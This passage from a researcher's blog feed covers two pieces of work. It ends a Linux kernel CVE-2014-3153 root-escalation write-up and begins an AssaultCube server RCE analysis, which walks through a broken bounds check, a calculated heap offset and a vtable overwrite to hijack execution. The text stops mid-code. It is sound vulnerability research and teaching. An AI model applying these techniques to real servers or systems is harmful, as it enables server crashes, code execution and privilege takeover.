The <code class="language-plaintext highlighter-rouge">read()</code> and <code class="language-plaintext highlighter-rouge">write()</code> syscalls internally invoke <code class="language-plaintext highlighter-rouge">copy_from_user()</code> and <code class="language-plaintext highlighter-rouge">copy_to_user()</code> within the kernel which do the checks according to <code class="language-plaintext highlighter-rouge">addr_limit</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">unsigned</span> <span class="kt">long</span>
<span class="nf">_copy_from_user</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">to</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">from</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">n</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">access_ok</span><span class="p">(</span><span class="n">VERIFY_READ</span><span class="p">,</span> <span class="n">from</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="c1">// <-- addr_limit comparison</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">__copy_from_user</span><span class="p">(</span><span class="n">to</span><span class="p">,</span> <span class="n">from</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
<span class="k">else</span>
<span class="n">memset</span><span class="p">(</span><span class="n">to</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
<span class="k">return</span> <span class="n">n</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">unsigned</span> <span class="kt">long</span>
<span class="nf">copy_to_user</span><span class="p">(</span><span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">to</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">from</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">n</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">access_ok</span><span class="p">(</span><span class="n">VERIFY_WRITE</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span> <span class="c1">// <-- addr_limit comparison</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">__copy_to_user</span><span class="p">(</span><span class="n">to</span><span class="p">,</span> <span class="n">from</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span>
<span class="k">return</span> <span class="n">n</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#define access_ok(type, addr, size) \
(likely(__range_not_ok(addr, size, user_addr_max()) == 0))
</span>
<span class="cp">#define user_addr_max() (current_thread_info()->addr_limit.seg)
</span></code></pre></div></div>
<p>At the signal handler several operations are done.</p>
<ol>
<li>Cancel the address space access limitation by setting <code class="language-plaintext highlighter-rouge">addr_limit</code> to the highest value possible.</li>
<li>Read the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> pointer of the corrupted thread.</li>
<li>Read the parent’s <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> pointer from the corrupted thread’s <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a> via the <code class="language-plaintext highlighter-rouge">group_leader</code> member which points to it.</li>
<li>Read the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct pointer from the parent’s <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/sched.h#L1027"><code class="language-plaintext highlighter-rouge">task_struct</code></a>.</li>
<li>Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct.</li>
</ol>
<h1 id="popping-shell">Popping Shell</h1>
<p>Now all that’s left to do is <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code> on the main thread to drop a shell.<br />
Because the child process inherits the <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct, the shell will also be in <code class="language-plaintext highlighter-rouge">root</code> permissions.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/L2pUKvGZtSw" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe></center>
<h1 id="concluding">Concluding</h1>
<p>This has been a lot of fun, and I’ve learned so much on the way.<br />
I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better.
Needless to say, there’s an infinite amount of knowledge to be gathered, but that’s a small step onwards.
At the end, the <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c">exploit</a> seems relatively short, but the truly important part is getting there and being able to solve the puzzle.</p>
<p>The full repository can be found <a href="https://github.com/elongl/CVE-2014-3153">here</a>.</p>
<p>If you have any questions, feel free to contact me and I’ll gladly answer.<br />
Hope you enjoyed the read. Thanks!</p>
<p>Special thanks to Nspace who helped throughout the process.</p>Understanding The KernelAssaultCube RCE: Technical Analysis2020-10-18T00:00:00+00:002020-10-18T00:00:00+00:00https://elongl.github.io/exploitation/2020/10/18/assaultcube-rce-technical-analysis<p>(Also available on <a href="https://medium.com/@elongl/assaultcube-rce-technical-analysis-e12dedf680e5">Medium</a>)</p>
<p>So I’ve been doing quite a lot of Wargames & CTFs and I was looking to research a “real” production application.</p>
<p>I decided to go with a game called <strong>AssaultCube</strong>.</p>
<p>The game is open-source and is still very active with quite a lot of players and servers still running, so I thought “that might be an interesting target”.</p>
<p><img src="https://cdn-images-1.medium.com/max/2400/0*Ocxqa-cjkiRh9LJ9.png" alt="(Cube Engine)" /></p>
<h2 id="defining-goals">Defining Goals</h2>
<p>The goal was clear and straightforward, achieving <strong>Remote Code Execution Client → Server</strong>.</p>
<p>There’s also the possibilities of client → client, or server → client, but they both <em>tend</em> to be easier as the client is usually written in a more trustful manner.
Escalating to admin, crashing the server, or writing some hacks (which <a href="https://github.com/elongl/assaultcube-aimbot-external">I did</a> by the way) were <strong>not</strong> what I was looking for.</p>
<h2 id="starting-out">Starting Out</h2>
<p>So I opened up the game’s code and started to get familiar with the codebase.
Right from the beginning I was looking for the code that takes input from the client and looked for ways to meddle with it, essentially providing unexpected data to the server.
Pretty quickly I came across the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2638">process</a> function at <code class="language-plaintext highlighter-rouge">server.cpp</code>.</p>
<p>This is the function that, according to the developers, does <em>“server-side processing of updates”</em>.<br />
Looks like a good place to start.</p>
<p>So I started going over the various updates that can be sent from the client, for instance, sending a text message or the player’s position on the map. I quickly noticed that reading data from the client is done using functions like <code class="language-plaintext highlighter-rouge">getstring</code> and <code class="language-plaintext highlighter-rouge">getint</code>, etc.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Sending a text message to other clients.</span>
<span class="k">case</span> <span class="n">SV_TEXT</span><span class="p">:</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span> <span class="c1">// Read input.</span>
<span class="n">filtertext</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span> <span class="c1">// Filter printable characters.</span>
<span class="n">trimtrailingwhitespace</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>According to my initial instincts, I started looking for simple “dumb” overflows with strings but they’ve wrapped it safely and I couldn’t find any of those (that would’ve been too easy). So I just kept reading the source and <em>recursively</em> looking into where the data I’m providing is being processed.</p>
<p>Then…
I came across <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2988">this</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">enum</span>
<span class="p">{</span>
<span class="n">GUN_KNIFE</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
<span class="n">GUN_PISTOL</span><span class="p">,</span>
<span class="n">GUN_CARBINE</span><span class="p">,</span>
<span class="n">GUN_SHOTGUN</span><span class="p">,</span>
<span class="n">GUN_SUBGUN</span><span class="p">,</span>
<span class="n">GUN_SNIPER</span><span class="p">,</span>
<span class="n">GUN_ASSAULT</span><span class="p">,</span>
<span class="n">GUN_CPISTOL</span><span class="p">,</span>
<span class="n">GUN_GRENADE</span><span class="p">,</span>
<span class="n">GUN_AKIMBO</span><span class="p">,</span>
<span class="n">NUMGUNS</span> <span class="c1">// Equals 10</span>
<span class="p">};</span>
<span class="p">...</span>
<span class="k">case</span> <span class="n">SV_PRIMARYWEAP</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">nextprimary</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">nextprimary</span> <span class="o"><</span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">nextprimary</span> <span class="o">>=</span> <span class="n">NUMGUNS</span><span class="p">)</span>
<span class="k">break</span><span class="p">;</span>
<span class="n">cl</span><span class="o">-></span><span class="n">state</span><span class="p">.</span><span class="n">nextprimary</span> <span class="o">=</span> <span class="n">nextprimary</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>If you haven’t spotted the “problem” yet, take a second and look it up.<br />
Let me preprocess that for you: <code class="language-plaintext highlighter-rouge">if (nextprimary < 0 && nextprimary >= 10)</code></p>
<p>There isn’t any integer that is both smaller than 0 and greater than 10.<br />
That means that no matter which <code class="language-plaintext highlighter-rouge">nextprimary</code> the client sends,<br />
it’ll be set at <code class="language-plaintext highlighter-rouge">cl->state.nextprimary</code> since the condition will never be met.
That could’ve easily been avoided with <code class="language-plaintext highlighter-rouge">-Wunreachable-code</code> but unfortunately that’s not included within <code class="language-plaintext highlighter-rouge">-Wall</code> which is the warning option in the Makefile of the project.</p>
<p>At that point, I immediately started looking for references to
<code class="language-plaintext highlighter-rouge">cl->state.nextprimary</code> to see what can I do with this bug.</p>
<p>A lot of the references seemed to be useless in terms of exploitation, but then I noticed the function that changed everything — <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/entity.h#L334">spawnstate</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">virtual</span> <span class="kt">void</span> <span class="nf">spawnstate</span><span class="p">(</span><span class="kt">int</span> <span class="n">gamemode</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">m_pistol</span><span class="p">)</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">GUN_PISTOL</span><span class="p">;</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">m_osok</span><span class="p">)</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">GUN_SNIPER</span><span class="p">;</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">m_lss</span><span class="p">)</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">GUN_KNIFE</span><span class="p">;</span>
<span class="k">else</span>
<span class="n">primary</span> <span class="o">=</span> <span class="n">nextprimary</span><span class="p">;</span>
<span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">m_noprimary</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">ammo</span><span class="p">[</span><span class="n">primary</span><span class="p">]</span> <span class="o">=</span> <span class="n">ammostats</span><span class="p">[</span><span class="n">primary</span><span class="p">].</span><span class="n">start</span> <span class="o">-</span> <span class="n">magsize</span><span class="p">(</span><span class="n">primary</span><span class="p">);</span>
<span class="n">mag</span><span class="p">[</span><span class="n">primary</span><span class="p">]</span> <span class="o">=</span> <span class="n">magsize</span><span class="p">(</span><span class="n">primary</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The function enables me to write a <em>somewhat</em> random integer (cannot control the value of the assignment) into memory that is at a constant offset from the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.h#L109">clientstate</a> struct (<code class="language-plaintext highlighter-rouge">mag</code>, <code class="language-plaintext highlighter-rouge">ammo</code> members) which is located within the much bigger <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.h#L226">client</a> struct.</p>
<p>I <a href="https://github.com/elongl/AC/commit/dc7b06208542de782e3703c3f8a9a0b8be254f5e">patched</a> the client’s code to send an unexpected integer (non-existent weapon ID), expecting it to cause the server to crash, essentially getting a segmentation fault.</p>
<p>And what do you know…</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/pQDS4FrSiNA" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe></center>
<p>The server has crashed and all clients were immediately disconnected.<br />
At this point I can just halt and ruin the game for other players.<br />
<em>(Don’t do that)</em></p>
<p>By the way, oddly enough, I later noticed that there is no input sanitation at the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2666'">introduction</a> of the client, so I could’ve also done it there.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">copystring</span><span class="p">(</span><span class="n">cl</span><span class="o">-></span><span class="n">name</span><span class="p">,</span> <span class="n">text</span><span class="p">,</span> <span class="n">MAXNAMELEN</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
<span class="n">copystring</span><span class="p">(</span><span class="n">cl</span><span class="o">-></span><span class="n">pwd</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
<span class="n">filterlang</span><span class="p">(</span><span class="n">cl</span><span class="o">-></span><span class="n">lang</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">wantrole</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="n">cl</span><span class="o">-></span><span class="n">state</span><span class="p">.</span><span class="n">nextprimary</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="n">loopi</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="n">cl</span><span class="o">-></span><span class="n">skin</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<h2 id="what-now">What now?</h2>
<p>Crashing the server is nice and all, but how can we actually escalate that into something more interesting?</p>
<p>My intuition was to look for members within the <code class="language-plaintext highlighter-rouge">client</code> that writing a random integer into would disrupt the game’s coherent flow.
At first, I couldn’t find any, given that the limitations are fierce (no control over what to write) so I mostly looked for booleans or values that a <em>sudden, out of the ordinary</em>, change would make a difference.</p>
<p>I started iterating over the members of the <code class="language-plaintext highlighter-rouge">client</code> struct to look for places to write a random integer into, and I saw that there are <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.h#L251">a few</a> <code class="language-plaintext highlighter-rouge">vector</code> structs.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="nc">client</span> <span class="p">{</span>
<span class="p">...</span>
<span class="n">clientstate</span> <span class="n">state</span><span class="p">;</span>
<span class="n">vector</span><span class="o"><</span><span class="n">gameevent</span><span class="o">></span> <span class="n">events</span><span class="p">;</span>
<span class="n">vector</span><span class="o"><</span><span class="n">uchar</span><span class="o">></span> <span class="n">position</span><span class="p">,</span> <span class="n">messages</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Perhaps overwriting the capacity member of the vector would introduce an overflow possibility! Making the vector think it’s bigger than it really is.</p>
<p>I opened up the <code class="language-plaintext highlighter-rouge">vector</code> definition to see how it’s <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/tools.h#L375">built</a> and after a little reading I quickly picked up that:</p>
<p><code class="language-plaintext highlighter-rouge">ulen</code> — Used Length, amount of elements within the vector.<br />
<code class="language-plaintext highlighter-rouge">alen</code> — Available Length, how many elements the vector can hold.<br />
<code class="language-plaintext highlighter-rouge">buf</code> — A pointer to the buffer itself.</p>
<p>Corrupting the <code class="language-plaintext highlighter-rouge">alen</code> of one of the vectors was tempting :)</p>
<p>I chose <code class="language-plaintext highlighter-rouge">messages</code> and not the other ones because this is the one that I can supply my own buffer into, and that’s why overflowing it would be ideal.
We’ll see that in a bit.</p>
<p>I calculated the offsets</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg> p &client.messages.alen
$10 = (int *) 0x17ca990
pwndbg> down
► f 0 42c560 playerstate::spawnstate(int)
f 1 411b32 sendspawn(client*)+258
f 2 41f93f
f 3 424d46
f 4 42620a
f 5 426289 main+89
f 6 7f3b7e0cc0b3 __libc_start_main+243
pwndbg> p &this->mag
$11 = (int (*)[10]) 0x17ca848
pwndbg> p (0x17ca990 - 0x17ca848) / 4
$14 = 0x52
// 0x52 is the offset from client.state.mag to client.messages.alen
// client.state.mag[0x52] == &client.messages.alen
</code></pre></div></div>
<p>I supplied <code class="language-plaintext highlighter-rouge">0x52</code> as the weapon ID and hoped that a big integer would be written into <code class="language-plaintext highlighter-rouge">alen</code> and luckily enough…</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/U9_75yxk2AY" frameborder="0" allowfullscreen=""></iframe></center>
<p>Should probably mention that it took a while before I realized that I could do that, the bug indeed seemed useful, but I just couldn’t find a good use to it at first to the point that I just sat it aside and kept on looking for other bugs while keeping in mind that I have this <em>card</em> to activate at need.
Glad I found this neat trick eventually.</p>
<p>As I said earlier, <code class="language-plaintext highlighter-rouge">messages</code> was the interesting vector because it’s the one that I could write data to, mostly using these <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2758">macros</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define QUEUE_MSG \
{ \
if (cl->type == ST_TCPIP) \
while (curmsg < p.length()) \
cl->messages.add(p.buf[curmsg++]); \
}
#define QUEUE_BUF(body) \
{ \
if (cl->type == ST_TCPIP) \
{ \
curmsg = p.length(); \
{ \
body; \
} \
} \
}
#define QUEUE_INT(n) QUEUE_BUF(putint(cl->messages, n))
#define QUEUE_UINT(n) QUEUE_BUF(putuint(cl->messages, n))
#define QUEUE_STR(text) QUEUE_BUF(sendstring(text, cl->messages))
</span></code></pre></div></div>
<p>The interesting calls to these macros are at these cases of the event handler:</p>
<ol>
<li><a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2844">SV_TEXT</a> — Queues the sent text message.</li>
<li><a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L3617">default</a> — Queues any uncaught data from the client.</li>
</ol>
<p>Let’s start with sending a big text message that would overflow <code class="language-plaintext highlighter-rouge">messages</code>.<br />
This is useful in order to see what is the following chunk of memory and whether it can be used for further exploitation. We could see that the actually allocated capacity before the overwrite is <code class="language-plaintext highlighter-rouge">0x20</code>, so as long as we write more than that we should overflow the buffer.</p>
<p>I patched the client to send <code class="language-plaintext highlighter-rouge">aaaabbbb...AAAABBBB...</code> so that it’ll be easy to tell how our buffer is being “consumed” by the code.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/lAu452kuy_0" frameborder="0" allowfullscreen=""></iframe></center>
<p>Wow.</p>
<p>Seems like we can already call a function of our choice.<br />
The <code class="language-plaintext highlighter-rouge">RAX</code> register is under our control and <code class="language-plaintext highlighter-rouge">RIP</code> is pointing at
<code class="language-plaintext highlighter-rouge">call qword ptr [rax + 0x40]</code></p>
<p>That’s very cool!
Let’s take a look at where this segfault occurs exactly.<br />
The writedemo <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L421">function</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">writedemo</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">demorecord</span><span class="p">)</span>
<span class="k">return</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">stamp</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="n">gamemillis</span><span class="p">,</span> <span class="n">chan</span><span class="p">,</span> <span class="n">len</span><span class="p">};</span>
<span class="n">lilswap</span><span class="p">(</span><span class="n">stamp</span><span class="p">,</span> <span class="mi">3</span><span class="p">);</span>
<span class="n">demorecord</span><span class="o">-></span><span class="n">write</span><span class="p">(</span><span class="n">stamp</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">stamp</span><span class="p">));</span>
<span class="n">demorecord</span><span class="o">-></span><span class="n">write</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>What we have done in our overflow is overwrite the vtable of <code class="language-plaintext highlighter-rouge">demorecord</code>.
This is possible since <code class="language-plaintext highlighter-rouge">demorecord</code> and <code class="language-plaintext highlighter-rouge">cl->messages</code> are adjacent chunks on the heap. If you’re unsure what vtables are and how dynamic dispatch works in C++, take a look <a href="https://pabloariasal.github.io/2017/06/10/understanding-virtual-tables/">here</a>.</p>
<p>The instruction dereferences the write function where <code class="language-plaintext highlighter-rouge">RAX</code> should be the vtable’s address.</p>
<p>Let’s review the flow of execution that got us into <code class="language-plaintext highlighter-rouge">writedemo</code>.
In the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L3810">serverslice</a> function which is the main game loop, each cycle, or tick, all inputs are read from the clients, and a “world state” is built.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">type</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="n">ENET_EVENT_TYPE_CONNECT</span><span class="p">:</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="p">}</span>
<span class="k">case</span> <span class="n">ENET_EVENT_TYPE_RECEIVE</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">cn</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">event</span><span class="p">.</span><span class="n">peer</span><span class="o">-></span><span class="n">data</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">valid_client</span><span class="p">(</span><span class="n">cn</span><span class="p">))</span>
<span class="n">process</span><span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">packet</span><span class="p">,</span> <span class="n">cn</span><span class="p">,</span> <span class="n">event</span><span class="p">.</span><span class="n">channelID</span><span class="p">);</span> <span class="c1">// Note the call to process.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">packet</span><span class="o">-></span><span class="n">referenceCount</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">enet_packet_destroy</span><span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">packet</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">case</span> <span class="n">ENET_EVENT_TYPE_DISCONNECT</span><span class="p">:</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">sendworldstate</span><span class="p">();</span> <span class="c1">// Followed by a function that internally calls `buildworldstate`.</span>
<span class="p">...</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">sendworldstate</code> calls <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L110">buildworldstate</a> which gathers all the messages from all the clients and unifies them into a <code class="language-plaintext highlighter-rouge">worldstate.messages</code></p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">loopv</span><span class="p">(</span><span class="n">clients</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">empty</span><span class="p">())</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">SV_CLIENT</span><span class="p">);</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">clientnum</span><span class="p">);</span>
<span class="n">putuint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">put</span><span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msglen</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">()</span> <span class="o">-</span> <span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">setsize</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="n">msize</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">msize</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">recordpacket</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">msize</span><span class="p">);</span>
<span class="n">ucharbuf</span> <span class="n">p</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">reserve</span><span class="p">(</span><span class="n">msize</span><span class="p">);</span>
<span class="n">p</span><span class="p">.</span><span class="n">put</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">msize</span><span class="p">);</span>
<span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">addbuf</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Afterwards, the worldstate messages is passed into <code class="language-plaintext highlighter-rouge">recordpacket</code> which simply calls <code class="language-plaintext highlighter-rouge">writedemo</code> with the same arguments.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">recordpacket</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">recordpackets</span><span class="p">)</span>
<span class="n">writedemo</span><span class="p">(</span><span class="n">chan</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">recordpacket</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="n">ENetPacket</span> <span class="o">*</span><span class="n">packet</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">recordpackets</span><span class="p">)</span>
